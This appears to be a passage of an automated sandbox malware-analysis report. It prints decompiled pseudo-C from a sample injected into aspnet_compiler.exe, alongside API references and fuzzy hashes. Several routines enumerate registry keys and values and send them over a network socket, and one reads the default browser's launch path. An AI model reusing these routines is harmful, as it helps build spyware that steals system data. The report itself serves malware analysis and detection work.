                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __freea$__alloca_probe_16_free
                • String ID: a/p$am/pm$hcD
                • API String ID: 2936374016-190199888
                • Opcode ID: bd0339a27ff2434fa59acf591c1612c68bf84e0e4e21ba565acc10f644ef9374
                • Instruction ID: 32e67ee006756031a0b78f425dd56af27fcec1da6a44ec8361004faafc6abf4c
                • Opcode Fuzzy Hash: bd0339a27ff2434fa59acf591c1612c68bf84e0e4e21ba565acc10f644ef9374
                • Instruction Fuzzy Hash: A9D1D231900205ABFB249FA8C955ABBB7B0FF06300F25419BE941AB342D77D9D81CB5B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0044F2A5(void* __edx, char _a4) {
                				void* _v8;
                				void* _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				char _v28;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t53;
                				void _t57;
                				intOrPtr _t58;
                				intOrPtr _t59;
                				intOrPtr _t60;
                				intOrPtr _t61;
                				signed int _t64;
                				char _t92;
                				char _t100;
                				void* _t101;
                				signed int _t104;
                				void* _t107;
                				void* _t121;
                				char* _t123;
                				signed int _t127;
                				intOrPtr* _t132;
                				void* _t133;
                				intOrPtr* _t134;
                				signed int _t135;
                				signed int _t136;
                				signed int _t137;
                				signed int _t138;
                				char* _t139;
                
                				_t121 = __edx;
                				_t100 = _a4;
                				_v28 = _t100;
                				_v24 = 0;
                				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                					_v16 = 1;
                					_t53 = E004443F4(_t101, 1, 0x50);
                					_v8 = _t53;
                					if(_t53 != 0) {
                						_t104 = 0x14;
                						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                						_t132 = E00444A38(0, 4);
                						_t127 = 0;
                						_v12 = _t132;
                						E00445002(0);
                						_pop(_t107);
                						if(_t132 != 0) {
                							 *_t132 = 0;
                							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                								_t133 = _v8;
                								_t57 =  *0x46f188; // 0x46f180
                								 *_t133 = _t57;
                								_t58 =  *0x46f18c; // 0x47065c
                								 *((intOrPtr*)(_t133 + 4)) = _t58;
                								_t59 =  *0x46f190; // 0x47065c
                								 *((intOrPtr*)(_t133 + 8)) = _t59;
                								_t60 =  *0x46f1b8; // 0x46f184
                								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                								_t61 =  *0x46f1bc; // 0x470660
                								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                								L19:
                								 *_v12 = 1;
                								if(_t127 != 0) {
                									 *_t127 = 1;
                								}
                								goto L21;
                							}
                							_t134 = E00444A38(_t107, 4);
                							_v20 = _t134;
                							E00445002(0);
                							if(_t134 == 0) {
                								L11:
                								E00445002(_v8);
                								E00445002(_v12);
                								return _v16;
                							}
                							 *_t134 = 0;
                							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                							_t135 = E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                							_t136 = _t135 | E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                							_v16 = _v8 + 8;
                							_t137 = _t136 | E004516F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                							_t138 = _t137 | E004516F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                							if((E004516F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                								_t123 =  *_v16;
                								while( *_t123 != 0) {
                									_t92 =  *_t123;
                									if(_t92 < 0x30 || _t92 > 0x39) {
                										if(_t92 != 0x3b) {
                											goto L16;
                										}
                										_t139 = _t123;
                										do {
                											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                											_t139 = _t139 + 1;
                										} while ( *_t139 != 0);
                									} else {
                										 *_t123 = _t92 - 0x30;
                										L16:
                										_t123 = _t123 + 1;
                									}
                								}
                								_t127 = _v20;
                								_t133 = _v8;
                								goto L19;
                							}
                							E0044F23C(_v8);
                							_v16 = _v16 | 0xffffffff;
                							goto L11;
                						}
                						E00445002(_v8);
                						return 1;
                					}
                					return 1;
                				} else {
                					_t127 = 0;
                					_v12 = 0;
                					_t133 = 0x46f188;
                					L21:
                					_t64 =  *(_t100 + 0x80);
                					if(_t64 != 0) {
                						asm("lock dec dword [eax]");
                					}
                					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                						asm("lock xadd [ecx], eax");
                						if((_t64 | 0xffffffff) == 0) {
                							E00445002( *((intOrPtr*)(_t100 + 0x7c)));
                							E00445002( *(_t100 + 0x88));
                						}
                					}
                					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                					 *(_t100 + 0x80) = _t127;
                					 *(_t100 + 0x88) = _t133;
                					return 0;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: e0708bc5a0d4a9f06ec679f0788951a62912216038da8a366d77298fca44e087
                • Instruction ID: 121fa3ad2d8a90f2dd1ed919a7657a0be01bb40abeb4b2edb7d8cd7f10ddde60
                • Opcode Fuzzy Hash: e0708bc5a0d4a9f06ec679f0788951a62912216038da8a366d77298fca44e087
                • Instruction Fuzzy Hash: D8610075900205AFEB20CF69C842B9FBBF4EF15724F14407BE844EB242EB749D468B98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00412D3D(void* __ecx, short* __edx) {
                				int _v8;
                				int _v12;
                				int _v16;
                				int _v20;
                				int _v24;
                				int _v28;
                				int _v32;
                				char _v56;
                				int _v60;
                				int _v64;
                				int _v68;
                				int _v72;
                				int _v76;
                				struct _FILETIME _v84;
                				void* _v95;
                				char _v96;
                				char _v108;
                				char _v132;
                				char _v156;
                				short _v668;
                				short _v1188;
                				char _v11188;
                				short _v43956;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				int _t72;
                				long _t73;
                				void* _t93;
                				long _t103;
                				void* _t104;
                				void* _t110;
                				void* _t140;
                				int _t144;
                				int _t146;
                				void* _t147;
                				void* _t148;
                				void* _t149;
                
                				_t137 = __edx;
                				_t112 = __ecx;
                				E00455FB0();
                				_push(_t140);
                				_t144 = 0;
                				_t110 = __ecx;
                				E00435760(_t140,  &_v1188, 0, 0x208);
                				_t149 = _t148 + 0xc;
                				_v24 = 0x104;
                				_v8 = 0;
                				_v12 = 0x3fff;
                				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                				_t72 = _v8;
                				if(_t72 != 0 && _t72 != 0) {
                					do {
                						_v28 = 0xff;
                						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                						_t152 = _t103;
                						if(_t103 == 0) {
                							_t104 = E0040415E(_t110,  &_v56, _t137, _t147, "\n");
                							_t137 =  &_v668;
                							E0040323D(E004042DC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
                							E00401EE9();
                							_t112 =  &_v56;
                							E00401EE9();
                						}
                						_t144 = _t144 + 1;
                					} while (_t144 < _v8);
                				}
                				_t73 = _v20;
                				if(_t73 != 0) {
                					_t146 = 0;
                					if(_t73 != 0) {
                						do {
                							_v96 = 0;
                							_v16 = 0x2710;
                							asm("stosd");
                							_v12 = 0x3fff;
                							asm("stosd");
                							asm("stosw");
                							asm("stosb");
                							_v43956 = 0;
                							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                							_t156 = _t73;
                							if(_t73 == 0) {
                								E00440751(_t112, _v32,  &_v96, 0xa);
                								_t149 = _t149 + 0xc;
                								E0040323D(E004042DC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040415E(_t110,  &_v132, _t137, _t147, "\n")));
                								E00401EE9();
                								E00401EE9();
                								L00403356(E004052DD(_t110,  &_v132,  &_v96, _t147, _t156, E00402073(_t110,  &_v56,  &_v43956, _t147, "\n")));
                								E00401FB8();
                								E00401FB8();
                								_t93 = E00402073(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
                								_t137 = E00402097(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
                								L00403356(E00402E81( &_v132, _t95, _t93));
                								E00401FB8();
                								E00401FB8();
                								_t112 =  &_v156;
                								_t73 = E00401FB8();
                							}
                							_t146 = _t146 + 1;
                						} while (_t146 < _v20);
                					}
                				}
                				return _t73;
                			}

                APIs
                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00412E73
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Enum$InfoQueryValue
                • String ID: 4G$84G$[regsplt]
                • API String ID: 3554306468-2898483682
                • Opcode ID: 7accb946cdf32411af8abb3756d89806eb3bfd201c9d9051f15644bed99baf95
                • Instruction ID: cf1d04cbe3be26fdb60a522ae5fe91f3eacc00445e23186f7e28dbfa0a80019f
                • Opcode Fuzzy Hash: 7accb946cdf32411af8abb3756d89806eb3bfd201c9d9051f15644bed99baf95
                • Instruction Fuzzy Hash: FA512B71900219AADB10EB91DD85EEFB7BCAF04304F50017AE505F2191EF74AB49CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E0045551A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
                				int _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				signed int _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t16;
                				signed int _t17;
                				int _t20;
                				signed int _t21;
                				int _t23;
                				signed int _t25;
                				int _t28;
                				intOrPtr* _t30;
                				int _t34;
                				int _t35;
                				void* _t36;
                				intOrPtr* _t37;
                				intOrPtr* _t38;
                				int _t46;
                				void* _t54;
                				void* _t56;
                				signed int _t58;
                				int _t61;
                				int _t63;
                				void* _t64;
                				void* _t65;
                				void* _t66;
                
                				_t58 = __edx;
                				_t59 = _a4;
                				_t61 = 0;
                				_t16 = E0044AB6C(_a4, 0, 0, 1);
                				_v20 = _t16;
                				_v16 = __edx;
                				_t65 = _t64 + 0x10;
                				if((_t16 & __edx) != 0xffffffff) {
                					_t17 = E0044AB6C(_t59, 0, 0, 2);
                					_t66 = _t65 + 0x10;
                					_t51 = _t17 & __edx;
                					__eflags = (_t17 & __edx) - 0xffffffff;
                					if((_t17 & __edx) == 0xffffffff) {
                						goto L1;
                					}
                					_t46 = _a8 - _t17;
                					__eflags = _t46;
                					_t5 =  &_a12; // 0x454445
                					_t20 =  *_t5;
                					asm("sbb eax, edx");
                					_v8 = _t20;
                					if(__eflags < 0) {
                						L24:
                						__eflags = _t20 - _t61;
                						if(__eflags > 0) {
                							L19:
                							_t13 =  &_v20; // 0x454445
                							_t21 = E0044AB6C(_t59,  *_t13, _v16, _t61);
                							__eflags = (_t21 & _t58) - 0xffffffff;
                							if((_t21 & _t58) != 0xffffffff) {
                								_t23 = 0;
                								__eflags = 0;
                								L31:
                								return _t23;
                							}
                							L20:
                							_t23 =  *((intOrPtr*)(E0043EEAD()));
                							goto L31;
                						}
                						if(__eflags < 0) {
                							L27:
                							_t14 =  &_a12; // 0x454445
                							_t25 = E0044AB6C(_t59, _a8,  *_t14, _t61);
                							_t66 = _t66 + 0x10;
                							__eflags = (_t25 & _t58) - 0xffffffff;
                							if((_t25 & _t58) == 0xffffffff) {
                								goto L20;
                							}
                							_t28 = SetEndOfFile(E0044ED18(_t59));
                							__eflags = _t28;
                							if(_t28 != 0) {
                								goto L19;
                							}
                							 *((intOrPtr*)(E0043EEAD())) = 0xd;
                							_t30 = E0043EE9A();
                							 *_t30 = GetLastError();
                							goto L20;
                						}
                						__eflags = _t46 - _t61;
                						if(_t46 >= _t61) {
                							goto L19;
                						}
                						goto L27;
                					}
                					if(__eflags > 0) {
                						L6:
                						_t63 = E004443F4(_t51, 0x1000, 1);
                						_pop(_t54);
                						__eflags = _t63;
                						if(_t63 != 0) {
                							_v12 = E00442C00(_t54, _t59, 0x8000);
                							_t34 = _v8;
                							_pop(_t56);
                							do {
                								__eflags = _t34;
                								if(__eflags < 0) {
                									L13:
                									_t35 = _t46;
                									L14:
                									_t36 = E0044A2B7(_t46, _t59, _t63, _t59, _t63, _t35);
                									_t66 = _t66 + 0xc;
                									__eflags = _t36 - 0xffffffff;
                									if(_t36 == 0xffffffff) {
                										_t37 = E0043EE9A();
                										__eflags =  *_t37 - 5;
                										if( *_t37 == 5) {
                											 *((intOrPtr*)(E0043EEAD())) = 0xd;
                										}
                										L23:
                										_t38 = E0043EEAD();
                										E00445002(_t63);
                										_t23 =  *_t38;
                										goto L31;
                									}
                									asm("cdq");
                									_t46 = _t46 - _t36;
                									_t34 = _v8;
                									asm("sbb eax, edx");
                									_v8 = _t34;
                									__eflags = _t34;
                									if(__eflags > 0) {
                										L12:
                										_t35 = 0x1000;
                										goto L14;
                									}
                									if(__eflags < 0) {
                										break;
                									}
                									goto L17;
                								}
                								if(__eflags > 0) {
                									goto L12;
                								}
                								__eflags = _t46 - 0x1000;
                								if(_t46 < 0x1000) {
                									goto L13;
                								}
                								goto L12;
                								L17:
                								__eflags = _t46;
                							} while (_t46 != 0);
                							E00442C00(_t56, _t59, _v12);
                							E00445002(_t63);
                							_t66 = _t66 + 0xc;
                							_t61 = 0;
                							__eflags = 0;
                							goto L19;
                						}
                						 *((intOrPtr*)(E0043EEAD())) = 0xc;
                						goto L23;
                					}
                					__eflags = _t46;
                					if(_t46 <= 0) {
                						goto L24;
                					}
                					goto L6;
                				}
                				L1:
                				return  *((intOrPtr*)(E0043EEAD()));
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID: EDE$EDE
                • API String ID: 269201875-1143427775
                • Opcode ID: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                • Instruction ID: 88694d13a6d820189563449504a694bd1f50df3e673083fec4fd5d227810db4a
                • Opcode Fuzzy Hash: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                • Instruction Fuzzy Hash: 83415B31A00944BBEB206BBA8C52A7F3BA5DF45335F24051FFC18C22D3E67C8809566E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00449C3C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t94;
                				long _t97;
                				void _t105;
                				void* _t112;
                				signed int _t116;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t135;
                				signed int _t136;
                				void* _t137;
                
                				_t78 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t78 ^ _t136;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t116 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x470810 + _t118 * 4)) + _t116 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t135 = _a4;
                				_v60 = _t86;
                				 *_t135 = 0;
                				 *((intOrPtr*)(_t135 + 4)) = 0;
                				 *((intOrPtr*)(_t135 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0x470810 + _v48 * 4));
                					_t123 =  *(_t129 + _t116 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
                						if(( *(E00444451(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                							} else {
                								_t112 = E004486A2( &_v28, _t133, 2);
                								_t137 = _t137 + 0xc;
                								if(_t112 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t116 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t94 = E004486A2();
                						_t137 = _t137 + 0xc;
                						if(_t94 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t97;
                							if(_t97 != 0) {
                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                									L19:
                									 *_t135 = GetLastError();
                								} else {
                									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t105 = 0xd;
                											_v32 = _t105;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				return E004338BB(_v8 ^ _t136);
                			}

                APIs
                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A3B1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00449C7E
                • __fassign.LIBCMT ref: 00449CF9
                • __fassign.LIBCMT ref: 00449D14
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00449D3A
                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D59
                • WriteFile.KERNEL32(?,?,00000001,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D92
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                • Instruction ID: 2d42c393ae315c603a8a69066ade60cad850b82c9b10e16282d480ace16cedcb
                • Opcode Fuzzy Hash: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                • Instruction Fuzzy Hash: 1D5181B1E00249AFEB10CFA8D885AEEBBF4EF09300F14416BE955E7291D6749D41CB69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00412FF5(short* __ecx, char __edx, void* __eflags, char _a4) {
                				void* _v16;
                				char _v28;
                				char _v52;
                				void* _v56;
                				char _v76;
                				void* _v80;
                				char _v100;
                				void* _v104;
                				char _v124;
                				void* _v128;
                				char _v148;
                				void* _v152;
                				char _v172;
                				void* _v176;
                				char _v196;
                				void* _v200;
                				char _v220;
                				void* _v224;
                				char _v225;
                				void* _v228;
                				void* _v248;
                				void* _v268;
                				void* __ebx;
                				void* __ebp;
                				void* _t28;
                				void* _t35;
                				void* _t36;
                				void* _t61;
                				short* _t116;
                				void* _t120;
                				void* _t123;
                				void* _t124;
                
                				_t103 = __edx;
                				_t123 =  &_v228 - 0x18;
                				_v225 = __edx;
                				_t116 = __ecx;
                				E004020D6(_t61, _t123, __edx, __eflags,  &_a4);
                				_t28 = E00412F64(_t61, __eflags);
                				_t124 = _t123 + 0x18;
                				_t62 = 0;
                				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
                					E00402073(0, _t124 - 0x18, _t103, _t120, "3");
                					_push(0x72);
                					E00404A81(0x473450, _t103, __eflags);
                				} else {
                					E00412D3D(_v224, _t103);
                					_t35 = E0041A879(0,  &_v28, 0x473420);
                					_t36 = E0041A879(0x473408,  &_v52, 0x473408);
                					_t129 = _v225;
                					_t107 =  ==  ? "0" : "1";
                					_t114 = E00402EF0(0x473408,  &_v220, E00402EF0(0x473408,  &_v196, E00402EF0(0x473408,  &_v172, E00402E81( &_v148, E00402EF0(0x473408,  &_v124, E00402E81( &_v100, E004052FE( &_v76,  ==  ? "0" : "1", 0x473420, 0x472ec8), _t36), 0x473420, _v225, 0x472ec8), _t35), 0x473420, _v225, 0x472ec8), 0x473420, _v225, 0x473438), 0x473420, _t129, 0x472ec8);
                					E00402EF0(0x473408, _t124 - 0x18, _t44, 0x473420, _t129, 0x4734d0);
                					_push(0x71);
                					E00404A81(0x473450, _t44, _t129);
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					L004086CB(0x473408, 0x473420, _t44, 0x46a8f0);
                					L004086CB(0x473408, 0x473408, _t114, 0x46a8f0);
                					L00405A86(0x473408, 0x473438, _t114, 0x464074);
                					L00405A86(0x473408, 0x4734d0, _t114, 0x464074);
                					RegCloseKey(_v268);
                					_t62 = 1;
                				}
                				E00401FB8();
                				return _t62;
                			}

                APIs
                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 0041302E
                  • Part of subcall function 00412D3D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                  • Part of subcall function 00412D3D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • RegCloseKey.ADVAPI32(00000000,00464074,00464074,0046A8F0,0046A8F0,00000071), ref: 0041319C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnumInfoOpenQuerysend
                • String ID: 4G$84G$P4G$P4G
                • API String ID: 3114080316-1145574035
                • Opcode ID: 0d5f97a4e4b972ea6f85d59d31702cef07beda235a800e8b333b0ba132068f3f
                • Instruction ID: fd6b18073abc04bee90befd91301638a83fdde0089edac9dbf0f47121c2ff828
                • Opcode Fuzzy Hash: 0d5f97a4e4b972ea6f85d59d31702cef07beda235a800e8b333b0ba132068f3f
                • Instruction Fuzzy Hash: 6841F6316442005BC318FB65D992AEFB3989FD0348F40893FF149631D2EF7C5A0A969E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0041A1E5(void* __ecx, void* __eflags) {
                				char _v8;
                				char _v12;
                				char _v16;
                				char _v20;
                				char _v44;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t23;
                				intOrPtr* _t25;
                				intOrPtr* _t27;
                				void* _t34;
                				void* _t43;
                				char* _t50;
                				void* _t57;
                				void* _t60;
                				void* _t61;
                				void* _t65;
                
                				_t65 = __eflags;
                				_t34 = __ecx;
                				E00412903(__ecx, 0x80000000, L"http\\shell\\open\\command", 0);
                				E004440A5(E00401EE4(_t34));
                				E00401EF3(_t34, 0x80000000, _t57, E00408682(_t34,  &_v44, 0, E0041B7DE(_t34, L".exe") + 4));
                				E00401EE9();
                				_t43 = _t61 - 0x18;
                				E004086D0(_t34, _t43, 0x80000000, _t65, _t34);
                				_push(_t43);
                				E00401EF3(_t34, 0x80000000, _t57, E0041A89D( &_v44, 0x80000000));
                				E00401EE9();
                				_t23 = E004022E5(_t34,  &_v8);
                				_t25 = E004022AA(_t34,  &_v12);
                				_t7 =  &_v16; // 0x40eb54
                				_t27 = E004022E5(_t34, _t7);
                				_t50 =  &_v20;
                				E00409291(_t50,  *_t27,  *_t25,  *_t23);
                				if(E0041AB12(_t50) != 0) {
                					_push(_t50);
                					_t56 = L"program files\\";
                					_t59 = E0041B7DE(_t34, L"program files\\");
                					if(_t31 != 0xffffffff) {
                						E0041B84F(_t34, _t34, 0x80000000, _t56, _t60, _t59, E0043A3D6(L"program files\\"), L"program files (x86)\\");
                					}
                				}
                				return _t34;
                			}

                APIs
                  • Part of subcall function 00412903: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                  • Part of subcall function 00412903: RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                  • Part of subcall function 00412903: RegCloseKey.ADVAPI32(?), ref: 0041294D
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                • _wcslen.LIBCMT ref: 0041A2BE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                • String ID: .exe$T@$http\shell\open\command$program files (x86)\$program files\
                • API String ID: 37874593-902212947
                • Opcode ID: eea2cf22a4efe82d17c19541fbdbba51614aa04f7c4649b811df4b5a21ef61cf
                • Instruction ID: 21aed5fb5d72de47c87afb81655524ea1d35e8d6521c3cb27bca8a170edf9ba1
                • Opcode Fuzzy Hash: eea2cf22a4efe82d17c19541fbdbba51614aa04f7c4649b811df4b5a21ef61cf
                • Instruction Fuzzy Hash: 0E218871B001042BDB04BAB69C96EEE32AD9B44318F14057FF806B72C2ED7D9D5947AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00455453(char* _a4, short* _a8) {
                				int _v8;
                				void* __ecx;
                				void* __esi;
                				short* _t10;
                				short* _t14;
                				int _t15;
                				short* _t16;
                				void* _t26;
                				int _t27;
                				void* _t29;
                				short* _t35;
                				short* _t39;
                				short* _t40;
                
                				_push(_t29);
                				if(_a4 != 0) {
                					_t39 = _a8;
                					__eflags = _t39;
                					if(__eflags != 0) {
                						_push(_t26);
                						E00446E61(_t29, _t39, __eflags);
                						asm("sbb ebx, ebx");
                						_t35 = 0;
                						_t27 = _t26 + 1;
                						 *_t39 = 0;
                						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                						_v8 = _t10;
                						__eflags = _t10;
                						if(_t10 != 0) {
                							_t40 = E00444A38(_t29, _t10 + _t10);
                							__eflags = _t40;
                							if(_t40 != 0) {
                								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                								__eflags = _t15;
                								if(_t15 != 0) {
                									_t16 = _t40;
                									_t40 = 0;
                									_t35 = 1;
                									__eflags = 1;
                									 *_a8 = _t16;
                								} else {
                									E0043EE77(GetLastError());
                								}
                							}
                							E00445002(_t40);
                							_t14 = _t35;
                						} else {
                							E0043EE77(GetLastError());
                							_t14 = 0;
                						}
                					} else {
                						 *((intOrPtr*)(E0043EEAD())) = 0x16;
                						E0043A5BB();
                						_t14 = 0;
                					}
